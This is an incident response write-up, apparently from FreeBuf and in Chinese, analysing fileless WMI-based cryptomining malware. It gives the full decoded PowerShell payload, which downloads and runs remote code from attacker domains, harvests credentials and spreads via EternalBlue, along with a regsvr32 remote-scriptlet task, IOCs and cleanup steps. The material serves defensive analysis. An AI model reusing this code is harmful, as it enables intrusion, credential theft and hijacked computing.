無文件挖礦應急響應處置報告

一、情況概述

1.1 情況拓撲

由於運維過程中可能存在違規操作、過失操作或者防護能力不足導致被惡意操作使得主機遭受挖礦程序的侵害,該挖礦程序會下載惡意程序至WMI中,實現無文件挖礦和內網滲透,並下載DDOS攻擊程序和通過任務計劃每隔20分鐘自動生成版本校驗惡意程序。

圖片.png

1.2 情況簡介

2019年4月4日收到用戶告警,內網主機存在CPU過高現象,同時網絡異常監測預警平臺告警內網主機有主動連接礦池行爲。

1.3 分析思路

挖礦程序如要體現出長久穩定的產出貨幣價值,其基礎功能實現、長期運行、自我隱藏和自我傳播的基本特性必不可少。遂根據惡意人員的攻擊基本意圖進行分析:

1.檢查挖礦運行過程;

2.檢查其自我傳播的方式方法;

3.檢查其如何長期運行;

4.檢查其如何滲透至操作系統中;

嘗試通過分析以上過程,從而閉環各個惡意環節的攻擊流程。

二、主機挖礦行爲分析處置

2.1 現狀描述

該主機CPU使用率75%:圖片.pngPowershell.exe佔用CPU較高,對其進行檢查。

圖片.png

2.2 父子進程對應表

wmic process得到的相關進程名、父進程、子進程經梳理後對應表如下所示:

Caption ParentProcessId ProcessId
wininit.exe 348 388
services.exe 388 504
svchost.exe 504 624
WmiPrvSE.exe 624 5148
powershell.exe 5148 3964
powershell.exe 3964 3180

各程序CommandLine詳見後續。

2.3 wininit.exe

CommandLine:wininit.exe

Windows啓動應用程序。用於啓動services.exe(服務控制管理器)、lsass.exe(本地安全授權)、lsm.exe(本地會話管理器)。

2.4 services.exe

CommandLine:C:\Windows\system32\services.exe

Windows服務管理應用程序。

2.5 svchost.exe

CommandLine:C:\Windows\system32\svchost.exe-k DcomLaunch 

DCOMLAUNCH服務可啓動COM和DCOM服務器,以響應對象激活請求。

2.6 WmiPrvSE.exe

CommandLine:C:\Windows\system32\wbem\wmiprvse.exe

wmiprvse.exe是微軟Windows操作系統的一部分,用於通過WinMgmt.exe程序處理WMI操作。

2.7 powershell.exe(PID 3964)

 

CommandLine:powershell.exe-NoP -NonI -W Hidden -E 

 

$ p i n   =   n e w - o b j e c t   s y s t e m . n e t . n e t w o r k i n f o r m a t i o n . p i n g  
 $ s e = @ ( ( ' u p d a t e . 7 h 4 u k . c o m ' ) , ( ' i n f o . 7 h 4 u k . c o m ' ) , ( ' 1 1 1 . 9 0 . 1 4 5 . 5 2 ' ) , ( ' 1 8 5 . 2 3 4 . 2 1 7 . 1 3 9 ' ) )  
 $ a v g s   =   @ ( )  
 $ n i c   =   ' u p d a t e . 7 h 4 u k . c o m '  
 f o r ( $ i = 0 ; $ i   - l e   3 ; $ i + + ) {  
 	 $ s u m   =   0  
 	 $ c o u n t   =   0  
 	 f o r ( $ j = 1 ; $ j   - l e   4 ; $ j + + ) {  
 	 	 $ t m p   =   ( $ p i n . s e n d ( $ s e [ $ i ] ) ) . R o u n d t r i p T i m e  
 	 	 i f   ( $ t m p   - n e   0 ) {  
 	 	 	 	 $ c o u n t   + =   1  
 	 	 }  
 	 	 $ s u m   + =   $ t m p  
 	 }  
 	 i f   ( $ c o u n t   - n e   0 ) {  
 	 	 	 $ a v g s   + =   $ s u m / $ c o u n t  
 	 } e l s e {  
 	 	 	 $ a v g s   + =   0  
 	 }  
 	 i f   ( $ i   - e q   0 ) {  
 	 	 i f   ( ( $ a v g s [ 0 ]   - l e   3 0 0 )   - a n d   ( $ a v g s [ 0 ]   - n e   0 ) ) {  
 	 	 	 $ n i c   =   $ s e [ 0 ]  
 	 	 	 b r e a k  
 	 	 }  
 	 }  
 	 i f   ( $ i   - e q   1 ) {  
 	 	 i f   ( $ a v g s [ 1 ]   - n e   0 ) {  
 	 	 	 i f   ( ( $ a v g s [ 0 ]   - l e   $ a v g s [ 1 ] )   - a n d   ( $ a v g s [ 0 ]   - n e   0 ) ) {  
 	 	 	 	 $ n i c   =   $ s e [ 0 ]  
 	 	 	 	 b r e a k  
 	 	 	 } e l s e {  
 	 	 	 	 $ n i c   =   $ s e [ 1 ]  
 	 	 	 	 b r e a k  
 	 	 	 }  
 	 	 }  
 	 }  
 	 i f   ( $ i   - e q   2 ) {  
 	 	 i f   ( ( $ a v g s [ 2 ]   - l e   3 0 0 )   - a n d   ( $ a v g s [ 2 ]   - n e   0 ) ) {  
 	 	 	 $ n i c   =   $ s e [ 2 ]  
 	 	 	 b r e a k  
 	 	 }  
 	 }  
 	 i f   ( $ i   - e q   3 ) {  
 	 	 i f   ( $ a v g s [ 3 ]   - n e   0 ) {  
 	 	 	 i f   ( ( $ a v g s [ 2 ]   - l e   $ a v g s [ 3 ] )   - a n d   ( $ a v g s [ 2 ]   - n e   0 ) ) {  
 	 	 	 	 $ n i c   =   $ s e [ 2 ]  
 	 	 	 	 b r e a k  
 	 	 	 } e l s e {  
 	 	 	 	 $ n i c   =   $ s e [ 3 ]  
 	 	 	 	 b r e a k  
 	 	 	 }  
 	 	 }  
 	 }  
 }  
 $ n i c = $ n i c + ( ' : ' + ' 4 4 3 ' )  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )  
 i f ( $ v e r   - n e   $ n u l l ) {  
         $ v e r _ t m p = ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : S y s t e m _ A n t i _ V i r u s _ C o r e ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e  
         i f ( $ v e r   - n e   $ v e r _ t m p ) {  
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / a n t i v i r u s . p s 1 " )  
                 r e t u r n  
         }  
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : S y s t e m _ A n t i _ V i r u s _ C o r e ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' W i n d o w s   E v e n t s ' }   | R e m o v e - W m i O b j e c t  
  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p  
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s   - c o n t a i n s   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 3 3 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 R u n D D O S   " c o h e r n e c e . e x e "  
 K i l l B o t ( ' S y s t e m _ A n t i _ V i r u s _ C o r e ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " ) )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {  
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : S y s t e m _ A n t i _ V i r u s _ C o r e ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : S y s t e m _ A n t i _ V i r u s _ C o r e ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
         $ v b s . r u n ( $ c m d m o n , 0 )  
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : S y s t e m _ A n t i _ V i r u s _ C o r e ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e  
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
 i f   ( ( $ a   - S p l i t   "   " ) [ 2 ] . l e n g t h   - n e   3 2 )  
 {  
         ( $ a   - S p l i t   "   " ) [ 2 ]   |   O u t - F i l e   - E n c o d i n g   a s c i i   " $ e n v : t e m p \ a 2 5 h Y 2 t l c m V k . t x t "  
 }  
  
 $ N e t w o r k s   =   [ S y s t e m . N e t . D N S ] : : G e t H o s t B y N a m e ( $ n u l l ) . A d d r e s s L i s t  
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : S y s t e m _ A n t i _ V i r u s _ C o r e ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e  
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : S y s t e m _ A n t i _ V i r u s _ C o r e ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : S y s t e m _ A n t i _ V i r u s _ C o r e ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )  
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )  
 {  
  
         $ I P A d d r e s s     =   $ N e t w o r k . I P A d d r e s s T o S t r i n g  
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }  
         $ S u b n e t M a s k     =   ' 2 5 5 . 2 5 5 . 2 5 5 . 0 '  
         $ i p s _ c = G e t - n e t w o r k r a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
         $ i p s _ b = G e t - I p I n B   $ I P A d d r e s s  
         $ i p s = $ i p s _ c + $ i p s _ b  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p  
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {  
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }  
 	 	 	 	 i f   ( ( T e s t - P o r t   $ i p )   - n e   $ f a l s e   - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )  
                 {  
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )  
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p )  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }  
  
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : S y s t e m _ A n t i _ V i r u s _ C o r e ' )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) 

 

powershell.exe是一種命令行外殼程序和腳本環境。參數簡介如下所示:

序號 參數 簡介
1 -NoP 不加載Windows PowerShell配置文件
2 -NonI 命令行運行後不和用戶進行交互
3 -W Hidden 將命令行運行窗口隱藏
4 -E 接受base-64編碼字符串版本的命令

個人不會代碼,所以對上述base64字符串進行解碼並添加代碼塊簡意是連蒙帶猜的,主要表達其中有部分內容將下一步工作指向WMI,如上所述在應急過程中進行是最好的,我當時是根據關鍵字查找大牛已經寫過的材料進行下一步工作:

 

 


 

$pin = new-object system.net.networkinformation.ping

 

$se=@(('update.7h4uk.com'),('info.7h4uk.com'),('111.90.145.52'),('185.234.217.139'))

 

$avgs = @()

 

$nic = 'update.7h4uk.com'

 

for($i=0;$i -le 3;$i++){

 

    $sum = 0

 

    $count = 0

 

//判斷服務端是否在線和延時情況以連接對應的域名或IP

 

    for($j=1;$j -le 4;$j++){

 

        $tmp =($pin.send($se[$i])).RoundtripTime

 

        if ($tmp -ne 0){

 

                $count += 1

 

        }

 

        $sum += $tmp

 

    }

 

    if ($count -ne 0){

 

            $avgs += $sum/$count

 

    }else{

 

            $avgs += 0

 

    }

 

    if ($i -eq 0){

 

        if (($avgs[0] -le 300) -and($avgs[0] -ne 0)){

 

            $nic = $se[0]

 

            break

 

        }

 

    }

 

    if ($i -eq 1){

 

        if ($avgs[1] -ne 0){

 

            if (($avgs[0] -le$avgs[1]) -and ($avgs[0] -ne 0)){

 

                $nic = $se[0]

 

                break

 

            }else{

 

                $nic = $se[1]

 

                break

 

            }

 

        }

 

    }

 

    if ($i -eq 2){

 

        if (($avgs[2] -le 300) -and($avgs[2] -ne 0)){

 

            $nic = $se[2]

 

            break

 

        }

 

    }

 

    if ($i -eq 3){

 

        if ($avgs[3] -ne 0){

 

            if (($avgs[2] -le$avgs[3]) -and ($avgs[2] -ne 0)){

 

                $nic = $se[2]

 

                break

 

            }else{

 

                $nic = $se[3]

 

                break

 

            }

 

        }

 

    }

 

}

 

//如果服務端版本不等於本地端版本,則下載服務端的antivirus.ps1

 

$nic=$nic+(':'+'443')

 

$ver=(New-ObjectNet.WebClient).DownloadString("http://$nic/ver.txt").Trim()

 

if($ver -ne $null){

 

    $ver_tmp=([WmiClass]'root\default:System_Anti_Virus_Core').Properties['ver'].Value

 

    if($ver -ne $ver_tmp){

 

        IEX (New-ObjectNet.WebClient).DownloadString("http://$nic/antivirus.ps1")

 

        return

 

    }

 

}

 

//獲取開機時間並進行定義

 

$stime=[Environment]::TickCount

 

//執行WmiClass裏root\default:System_Anti_Virus_Core-"funs"屬性內容,釋放WMI exec和永恆之藍攻擊代碼

 

$funs = ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['funs'].Value

 

$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))

 

iex $defun

 

//在wmi對象裏查找root\subscription空間,定位windows系統日誌,刪除

 

Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription |Where-Object {$_.filter -notmatch 'Windows Events'} |Remove-WmiObject

 

//按cpu大小遞減方式逐個獲取powershell.exe進程ID

 

[array]$psids= get-process -name powershell |sort cpu -Descending|ForEach-Object {$_.id}

 

$tcpconn = netstat -anop tcp

 

$exist=$False

 

//判斷本機是否在給自己挖礦,例如已運行的powershell.exe和外部地址的80或14444或14433端口是否有已建立的TCP連接,否則循環

 

if ($psids -ne $null )

 

{

 

    foreach ($t in $tcpconn)

 

    {

 

        $line =$t.split(' ')|?{$_}

 

        if ($line -eq $null)

 

        {continue}

 

        if (($psids -contains$line[-1]) -and $t.contains("ESTABLISHED") -and($t.contains(":80 ") -or $t.contains(":14444") -or$t.contains(":14433")) )

 

        {

 

            $exist=$true

 

            break

 

        }

 

    }

 

}

 

!!!

 

RunDDOS "cohernece.exe"

 

KillBot('System_Anti_Virus_Core')

 

//殺掉其他挖礦程序,例如與外部端口3333,55555,7777已建立連接的挖礦程序

 

foreach ($t in $tcpconn)

 

    {

 

        $line =$t.split(' ')|?{$_}

 

        if (!($line -is[array])){continue}

 

        if(($line[-3].contains(":3333") -or$line[-3].contains(":5555") -or$line[-3].contains(":7777")) -and$t.contains("ESTABLISHED"))

 

        {

 

            $evid=$line[-1]

 

            Get-Process -id $evid| stop-process -force

 

        }

 

    }

 

//如果沒有挖礦,例如本機沒有連接外部14444或14433端口和已運行powershell.exe小於8個,執行WmiClass的root\default:System_Anti_Virus_Core-"mon"和"funs"屬性內容進行挖礦和內網滲透。

 

if (!$exist -and ($psids.count -le 8))

 

{

 

    $cmdmon="powershell -NoP-NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mon'].Value;`$funs= ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value;iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command  -ScriptBlock `$RemoteScriptBlock-ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`""

 

    $vbs = New-Object -ComObjectWScript.Shell

 

    $vbs.run($cmdmon,0)

 

}

 

//取WmiClass的root\default:System_Anti_Virus_Core-"mimi"屬性內容賦給$mimi,並檢查長度是否32位,如果不是將該內容輸出至temp\a25hY2tlcmVk.txt文件

 

$NTLM=$False

 

$mimi = ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['mimi'].Value

 

$a, $NTLM= Get-creds $mimi $mimi

 

if (($a -Split " ")[2].length -ne 32)

 

{

 

    ($a -Split " ")[2] |Out-File -Encoding ascii "$env:temp\a25hY2tlcmVk.txt"

 

}

 

$Networks = [System.Net.DNS]::GetHostByName($null).AddressList

 

//將"ipsu"屬性內容賦值給$ipsu

 

$ipsu = ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['ipsu'].Value

 

//將"i17"屬性內容賦值給$i17

 

$i17 = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['i17'].Value

 

//將"sc"屬性內容賦值給$scba

 

$scba= ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['sc'].Value

 

//將"sc"屬性內容轉換成8位無符號整數數組

 

[byte[]]$sc=[System.Convert]::FromBase64String($scba)

 

foreach ($Network in $Networks)

 

{

 

//格式化IP地址

 

    $IPAddress  = $Network.IPAddressToString

 

//判斷自身IP地址是否爲空

 

    if ($IPAddress -match'^169.254'){continue}

 

    $SubnetMask  = '255.255.255.0'

 

//將Get-networkrange到的IP和掩碼賦值給$ips_c

 

    $ips_c=Get-networkrange$IPAddress $SubnetMask

 

//將Get-IpInB到的IP賦值給$ips_b

 

    $ips_b=Get-IpInB $IPAddress

 

    $ips=$ips_c+$ips_b

 

    $tcpconn = netstat -anop tcp

 

//取tcp連接是已建立狀態且不包含127.0.0.1,並不是自己連自己,最後類似入棧行爲

 

    foreach ($t in $tcpconn)

 

    {

 

        $line =$t.split(' ')|?{$_}

 

        if (!($line -is[array])){continue}

 

        if ($line.count -le4){continue}

 

//分割外部地址並只取IP

 

        $i=$line[-3].split(':')[0]

 

//如果tcp連接是已建立狀態且不包含127.0.0.1,並不是自己連自己則繼續

 

        if ( ($line[-2] -eq'ESTABLISHED') -and  ($i -ne '127.0.0.1')-and ($ips -notcontains $i))

 

        {

 

            $ips+=$i

 

        }

 

    }

 

//如果開機時間小於1.5個小時則繼續

 

    if(([Environment]::TickCount-$stime)/1000 -gt 5400){break}

 

    foreach ($ip in $ips)

 

    {

 

        if(([Environment]::TickCount-$stime)/1000 -gt 5400){break}

 

        if ($ip -eq$IPAddress){continue}

 

//MS17-010永恆之藍攻擊

 

                if ((Test-Port $ip)-ne $false -and $ipsu -notcontains $ip)

 

        {

 

            $re=0

 

            if ($a.count -ne 0)

 

            {$re = test-ip -ip $ip-creds $a  -nic $nic -ntlm $NTLM }

 

            if ($re -eq 1){$ipsu=$ipsu +" "+$ip}

 

            else

 

            {

 

                $vul=[PingCastle.Scanners.m17sc]::Scan($ip)

 

                if ($vul -and $i17-notcontains $ip)

 

                {

 

                   $res=eb7 $ip $sc

 

                   if (!($res -eq$true))

 

                   {eb8 $ip $sc}

 

                   $i17 = $i17 +" "+$ip

 

                }

 

            }

 

        }

 

    }

 

 }

 

//賦值給staticClass

 

$StaticClass=New-ObjectManagement.ManagementClass('root\default:System_Anti_Virus_Core')

 

//wmiexec攻擊成功的失陷主機IP賦值給StaticClass的ipsu

 

$StaticClass.SetPropertyValue('ipsu' ,$ipsu)

 

//推送更新

 

$StaticClass.Put()

 

//永恆之藍攻擊成功將失陷主機IP賦值給StaticClass的i17

 

$StaticClass.SetPropertyValue('i17' ,$i17)

 

//推送更新

 

$StaticClass.Put()

 

 

2.8 powershell.exe(PID 3180)

內容和上一個powershell載荷重複,詳見目錄2.7。

2.9 WmiClass檢查

根據分析PID 3964內存中的內容,發現各種惡意內容都儲存在WMI root\default:System_Anti_Virus_Core中,如需要調用,也是直接加載到內存中執行,即實現本地無文件挖礦和內網滲透。

Windows自帶wbemtest.exe工具可以管理Windows Management Instrumentation。圖片.png圖片.png圖片.png圖片.png下拉框至最底部,發現PID 3964內存數據中存在的各個屬性。

圖片.png

圖片.png

2.9.1 ver屬性(由於不會代碼,以下部分內容從數據包層面進行功能驗證)

查詢DNS記錄,並ping測試服務端在線情況。

圖片.png數據包顯示第一個動作即是驗證版本,如版本不一致即下載antivirus.ps1。

圖片.png圖片.png更新完成之後服務端和本地端版本一致。

圖片.png服務端版本

 

圖片.png本地版本

 

2.9.2 funs屬性

對funs內容進行解碼並上傳雲端進行殺毒。

 

圖片.png圖片.png

 

2.9.3 ipsu/i17/mimi/sc屬性

 

ipsu和i17由於wmiexec和MS17-010沒有攻擊成功所以屬性沒有賦值。

 

mimi和sc由於技術有限,未繼續進行分析。

 

2.9.4 mon屬性

 

技術有限,未在代碼層面進行分析,PID 3180會釋放mon內容進行挖礦行爲。

 

圖片.png圖片.png圖片.png2.9.5 內網滲透

 

根據PID 3964和PID 3180內存中的數據,分析兩個程序都會釋放funs內容以進行內網滲透。

 

圖片.png從ARP層面判斷存活主機:

 

圖片.png從TCP三次握手機制判斷目標範圍內的445端口是否開啓:

 

圖片.png圖片.png2.10 antivirus.ps1檢查

 

由於PID 3964 get該文件並加載到內存後沒有存儲行爲,且利用瀏覽器使用相同的請求頭部也無法下載該文件,導致無法繼續分析(後來發現在命令行中運行然後重定向到文件 中即可對其進行分析)。根據該進程判斷該文件至少包括修改WmiClass、下載cohernece.exe等惡意程序的功能。

 

2.11 cohernece.exe檢查

 

該文件2019年1月12日1:30生成。

 

圖片.png圖片.png同目錄下還存在java-log-9527.log,經查閱資料,該文件是cohernece.exe的攻擊載荷。

 

圖片.png2.12 關聯檢查

 

根據名稱進行搜索。發現多個目錄下存在該文件。如下圖紅框所示:

 

圖片.png根據該文件生成時間進行搜索,同一時間在極其隱蔽的目錄下:

 

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5

 

每隔20分鐘就會自動生成一個htm文件。

 

圖片.png圖片.png對其進行解碼,如下圖所示,按名稱理解主要作用於檢查版本或本地/雲端版本不一致時進行更新。

 

圖片.png

 

下載內容如下簡示:

 

圖片.png由於其生成時間固定,查詢到任務計劃時發現惡意定時任務:

 

 

圖片.png圖片.png

 

兩個任務計劃定時操作:

/u /s /i:http://update.7h4uk.com/antivirus.php scrobj.dll

 

如上鍊接測試無法下載,80替換443後可以下載。

 

2.13 Ioc

 

2.13.1 url

 

update.7h4uk.com

 

info.7h4uk.com

 

f4keu.7h4uk.com

 

xmr-eu1.nanopool.org

2.13.2 ip

 

185.234.217.139

 

185.234.217.111

 

111.90.145.52

 

151.80.144.25

 

51.255.34.118

 

51.15.65.182

 

164.132.109.110

 

213.32.29.143

 

51.15.54.102

 

51.15.78.68

 

5.196.13.29

 

217.182.169.148

 

5.196.23.240

2.13.3 md5

 

cohernece.exe 4fe2de6fbb278e56c23e90432f21f6c8

 

9527.log      c2e31d4b8d6f9169d4557587b9d595ec

三、應急處置

 

根據現場情況經用戶溝通確認,通過內網主機進行以下工作完成了對惡意程序的清除:

1.任務計劃刪除定時任務;

2.按順序kill PID 3964、3180和cohernece.exe;

3.已在WMI中將root\default:System_Anti_Virus_Core的funs、i17、ipsu、mimi、mon、sc、ver屬性刪除;

4.已刪除cohernece.exe和antivirus*.htm。

四、基礎防護能力檢查

 

4.1 防火牆和MS17010

 

在本地未安裝MS17010相關補丁的情況下對外開放了445端口,且無第三方殺軟或應用層防火牆,本地網絡層防火牆未啓用,無法針對入棧訪問本地高危端口行爲進行訪問控制。

 

圖片.png

 

4.2 Tomcat日誌

 

Tomcat訪問日誌功能未啓用。

 

圖片.png

 

五、分析結論和處理建議

 

5.1 分析結論

 

本次內網主機CPU使用率過高經檢查是因爲存在挖礦行爲導致,由於tomcat未啓用訪問日誌記錄功能,未在WEB層面進行攻擊溯源。但根據目錄4.1的分析,完全可以通過目錄2中的惡意程序對內網防護不到位的主機實現自動化內網滲透。

 

5.2 處理建議

 

爲減少被惡意行爲取得管理權限後進行勒索或挖礦等發生安全事件的可能性,建議至少包括但不限於:

1.加強准入控制,訪問應用系統建議必須經過多層應用防護;

2.內網管理服務器建議必須經過堡壘機管控和審計,外網管理服務器建議必須通過VPN加密進入內網後再通過堡壘機進行管控和審計;

3.加強準出控制,建議對互聯網或對外提供服務的應用系統,在互聯網出口只做端口映射或雙向地址置換,如無必要,建議禁止互聯網出口代理應用系統的IP出互聯網;

4.應用系統建議經過代碼審計和滲透測試後再對互聯網或對外提供服務;

5.建議不要因爲是測試服務器而降低其安全標準,基於木桶原理,以防測試服務器發生安全事件被獲取權限從而可以橫向滲透內網,因此再次強調業務系統服務器如無必要,禁止主動訪問互聯網,以防獲取管理權限後反彈管理權限至互聯網;

6.辦公終端需預防U盤釣魚或交叉感染惡意程序,儘量不要打開來歷不明的文檔、程序、郵件中的附件,防止社工釣魚。

*本文原創作者:竹林再遇北極熊,本文屬於FreeBuf原創獎勵計劃,未經許可禁止轉載

竹林再遇北極熊

竹林再遇北極熊 1 篇文章 等級: 1

|

|

發表評論

已有 10 條評論

  • 123  2019-07-05 回覆 1樓

     

    直接把winmgmt服務關了完事

    亮了(1)

    • langyajiekou  (6級)  2019-07-05 回覆

       

      @ 123 有些管理需要,不能關停的。

      亮了(0)

    • 竹林再遇北極熊  (1級) 安徽三實  2019-07-07 回覆

       

      winmgmt只是運行其的平臺,只要黑進來了該怎麼開還是在怎麼開,說到底還是您說的這個思路、這個安全意識必須要有,高危的,不是必須的,站在運維的角度或站在應急響應的角度,真心不建議對外開放或者運行,不然的話根本不會存在這樣的應急。

      亮了(0)

  • A-new  (1級)  2019-07-05 回覆 2樓

     

    powerghost,這個很久之前就有相關文章了

    亮了(0)

    • 竹林再遇北極熊  (1級) 安徽三實  2019-07-07 回覆

       

      首先,我特意搜了以下freebuf的“關於我們”,裏面的一些內容和本次回覆是不矛盾的,而且經過編輯審覈,肯定不會和其他文章重合。
      另外我老大很久之前和我們說過,會的問題自認爲肯定都是很簡單的,如果你處理過一個問題,是你不會的,處理成功對自己是一次提升;寫出來,是一次提升,說出來,說不通,或者別人問問題你不會,你搞懂了,又是一次提升。其目的就不單單是分享了,更多的還是提升自己。

